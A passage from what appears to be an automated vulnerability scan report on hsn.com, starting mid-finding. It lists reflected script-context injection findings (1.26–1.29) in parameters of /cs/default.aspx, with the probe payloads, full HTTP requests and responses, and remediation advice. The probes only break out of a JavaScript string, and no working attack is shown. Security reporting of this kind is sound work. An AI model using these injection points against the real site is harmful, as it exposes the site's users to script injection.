Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTHID=03BA4BAD44105A7D8A00669067DA5C1B; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 20:02:53 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 168831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
ces/GetShareComponent.aspx?R=' + Math.floor(Math.random() * 1000); //don not change this
url += "&url=" + encodeURI('http://www.hsn.com/brand-video_at-4260_xa.aspx?nolnav=1c25da';426cda0b393') + "&title=" + encodeURI('Brand Video Hub at HSN.com') + "&profile=AT&cmSpPage=articles&pageID=Brand Video Hub";
new Ajax.Updater($('BreadCrumbsSharePlaceHolder'), url,

...[SNIP]...

1.26. http://www.hsn.com/cs/default.aspx [cm_mmc parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hsn.com
Path:   /cs/default.aspx

Issue detail

The value of the cm_mmc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2b5b'%3b85b7ac1babf was submitted in the cm_mmc parameter. This input was echoed as b2b5b';85b7ac1babf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cs/default.aspx?cm_sp=Global*TNL*Help&cm_mmc=sharingsite*Facebook*articles*HSN_Customer_Service_Pageb2b5b'%3b85b7ac1babf HTTP/1.1
Host: www.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerhsn_https_pool=520426924.47873.0000; TaazABUser=true; cmRS=&t1=1292009455654&t2=1292009456970&t3=1292009472812&t4=-1&lti=1292009472811&ln=&hr=/100k-givaway_at-5167_xa.aspx%3Fnolnav%3D1&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=/cnt/shared/tnavv7.aspx&ho=ww62.hsn.com/cm%3F&ci=90028889&ul=http%3A//www.hsn.com/cnt/shared/tnavV7.aspx&rf=http%3A//blogs.hsn.com/; __utmv=94391299.B; sitesession=o=esearch; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|3|1|1292009445||&; TLTHID=50D51C6141D4048D3DAB44B6B7C991C7; customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; bandwidth=1484; CustState=Now=12/10/2010 2:31:30 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; custPref=persistentBar=true; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; __utmc=94391299; __utmb=94391299.20.10.1292009442; partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; newAlerts=0; TLTSID=AD2EA45D444C5361509642BD6C0C11B2;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=&return_url=htyXWH4kfbv5bJkQkBDNfkO0DnUN%2bEByVJe8Jh8VArd2xhmnoeMM3obuvJTDfPZHsm1yp5oJIKs0KAJwoRpEJJlNYgZGi9B8fqgTrRQjIAJ8DKWfu9n8QQvpkbOBJi50EJI%2bl%2fIYxZ6rr%2f6jMAXxQ0XOi785%2bUBeIXEiQ1Mm1pRr%2b1lsB4F7AxKJpg24w4cDbtppLM40LL4%3d; domain=.hsn.com; path=/
Set-Cookie: sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: CustState=Now=12/10/2010 3:02:21 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTHID=5446F57C4D620D8653314A92D739E1B4; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 20:02:21 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 92127


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
/don not change this
url += "&url=" + encodeURI('http://www.hsn.com/cs/default.aspx?cm_sp=Global*TNL*Help&amp;cm_mmc=sharingsite*Facebook*articles*HSN_Customer_Service_Pageb2b5b';85b7ac1babf') + "&title=" + encodeURI('HSN Customer Service Page at HSN.com') + "&profile=AT&cmSpPage=articles&pageID=HSN Customer Service Page";
new Ajax.Updater($('BreadCrumbsShareP
...[SNIP]...

1.27. http://www.hsn.com/cs/default.aspx [cm_sp parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hsn.com
Path:   /cs/default.aspx

Issue detail

The value of the cm_sp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d48a3'%3b815da0e4ed7 was submitted in the cm_sp parameter. This input was echoed as d48a3';815da0e4ed7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cs/default.aspx?cm_sp=Global*TNL*Helpd48a3'%3b815da0e4ed7 HTTP/1.1
Host: www.hsn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; TLTSID=AD2EA45D444C5361509642BD6C0C11B2; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); newAlerts=0; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; TaazABUser=true; bandwidth=1484; customer=ksUrl=P8uIrOOpnufElB5p%2f3Qpx8DMkYnb0AloWJeRNCi8Q8BW7zdnvpco2w%3d%3d&Look_Up_=CE_1&email=; CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|2|1|1292009445||&; sitesession=o=esearch; custPref=persistentBar=true; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; CustState=Now=12/10/2010 2:31:12 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; TLTHID=6D0DA2ED4147ED541EF2E8A9DEF34643; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; __utmc=94391299; __utmv=94391299.B; __utmb=94391299.10.10.1292009442

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: customer=ksUrl=P8uIrOOpnufElB5p%2f3Qpx8DMkYnb0AloWJeRNCi8Q8BW7zdnvpco2w%3d%3d&Look_Up_=CE_1&email=&return_url=bK6pBIKW31dg5fHXHDFjksuiUW4Jkf9rNJyaguwg9UR9khn2%2fR4dBtb94Pki54rENOXlXhGTHJUKf6gGV%2bg2hA5okw9c8IIK0SqIY8TOLpGaDXWEDJ0dzg%3d%3d; domain=.hsn.com; path=/
Set-Cookie: sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:26 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTHID=62FC2DF94332D6B807D40BAB3606738C; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:25 GMT
Vary: Accept-Encoding
Content-Length: 91997


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
es/GetShareComponent.aspx?R=' + Math.floor(Math.random() * 1000); //don not change this
url += "&url=" + encodeURI('http://www.hsn.com/cs/default.aspx?cm_sp=Global*TNL*Helpd48a3';815da0e4ed7') + "&title=" + encodeURI('HSN Customer Service Page at HSN.com') + "&profile=AT&cmSpPage=articles&pageID=HSN Customer Service Page";
new Ajax.Updater($('BreadCrumbsShareP
...[SNIP]...

1.28. http://www.hsn.com/cs/default.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hsn.com
Path:   /cs/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11e3c'%3b3f84895d447 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 11e3c';3f84895d447 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cs/default.aspx?cm_sp=Global*TNL*Help&11e3c'%3b3f84895d447=1 HTTP/1.1
Host: www.hsn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; TLTSID=AD2EA45D444C5361509642BD6C0C11B2; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); newAlerts=0; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; TaazABUser=true; bandwidth=1484; customer=ksUrl=P8uIrOOpnufElB5p%2f3Qpx8DMkYnb0AloWJeRNCi8Q8BW7zdnvpco2w%3d%3d&Look_Up_=CE_1&email=; CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|2|1|1292009445||&; sitesession=o=esearch; custPref=persistentBar=true; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; CustState=Now=12/10/2010 2:31:12 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; TLTHID=6D0DA2ED4147ED541EF2E8A9DEF34643; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; __utmc=94391299; __utmv=94391299.B; __utmb=94391299.10.10.1292009442

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: customer=ksUrl=P8uIrOOpnufElB5p%2f3Qpx8DMkYnb0AloWJeRNCi8Q8BW7zdnvpco2w%3d%3d&Look_Up_=CE_1&email=&return_url=u8NOqS6gQ4UyTEF7IQeVhPVJTgNIyGCYIvfVuLCTaEDgdLZ0UkmuHF7FIHc4RMHLeCi6%2b2lDAhTDExZDNNGh48fmtl1Z6EP5hVOTLwWmmzoIvqGfgrhAvg%3d%3d; domain=.hsn.com; path=/
Set-Cookie: sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:54 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTHID=344A507E480595A038F60F93E28A7158; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:54 GMT
Vary: Accept-Encoding
Content-Length: 92007


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
tShareComponent.aspx?R=' + Math.floor(Math.random() * 1000); //don not change this
url += "&url=" + encodeURI('http://www.hsn.com/cs/default.aspx?cm_sp=Global*TNL*Help&amp;11e3c';3f84895d447=1') + "&title=" + encodeURI('HSN Customer Service Page at HSN.com') + "&profile=AT&cmSpPage=articles&pageID=HSN Customer Service Page";
new Ajax.Updater($('BreadCrumbsShar
...[SNIP]...

1.29. https://www.hsn.com/cs/default.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.hsn.com
Path:   /cs/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 927f7'%3ba06e1e092d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 927f7';a06e1e092d8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cs/default.aspx?927f7'%3ba06e1e092d8=1 HTTP/1.1
Host: www.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerhsn_https_pool=520426924.47873.0000; TaazABUser=true; cmRS=&t1=1292009455654&t2=1292009456970&t3=1292009472812&t4=-1&lti=1292009472811&ln=&hr=/100k-givaway_at-5167_xa.aspx%3Fnolnav%3D1&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=/cnt/shared/tnavv7.aspx&ho=ww62.hsn.com/cm%3F&ci=90028889&ul=http%3A//www.hsn.com/cnt/shared/tnavV7.aspx&rf=http%3A//blogs.hsn.com/; __utmv=94391299.B; sitesession=o=esearch; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|3|1|1292009445||&; TLTHID=50D51C6141D4048D3DAB44B6B7C991C7; customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; bandwidth=1484; CustState=Now=12/10/2010 2:31:30 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; custPref=persistentBar=true; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; __utmc=94391299; __utmb=94391299.20.10.1292009442; partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; newAlerts=0; TLTSID=AD2EA45D444C5361509642BD6C0C11B2;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=&return_url=4D4zDNLstM8JCGc4SkS8PZAFH%2f6ATWPFCJaENcFbS5R0Kev6K%2fRZpEyvMz1jgWKUuhpim5rFjhc5bYStQxeOfA%3d%3d; domain=.hsn.com; path=/
Set-Cookie: sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: CustState=Now=12/10/2010 3:00:45 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTHID=0532BE8B4CDFEC4606BF8490D5CB6566; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 20:00:45 GMT
Connection: close
Set-Cookie: BIGipServerhsn_https_pool=520426924.47873.0000; expires=Fri, 10-Dec-2010 20:05:45 GMT; path=/
Vary: Accept-Encoding
Content-Length: 93919


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
cnt/WebServices/GetShareComponent.aspx?R=' + Math.floor(Math.random() * 1000); //don not change this
url += "&url=" + encodeURI('http://https://www.hsn.com/cs/default.aspx?927f7';a06e1e092d8=1') + "&title=" + encodeURI('HSN Customer Service Page at HSN.com') + "&profile=AT&cmSpPage=articles&pageID=HSN Customer Service Page";
new Ajax.Updater($('BreadCrumbsShar
...[SNIP]...
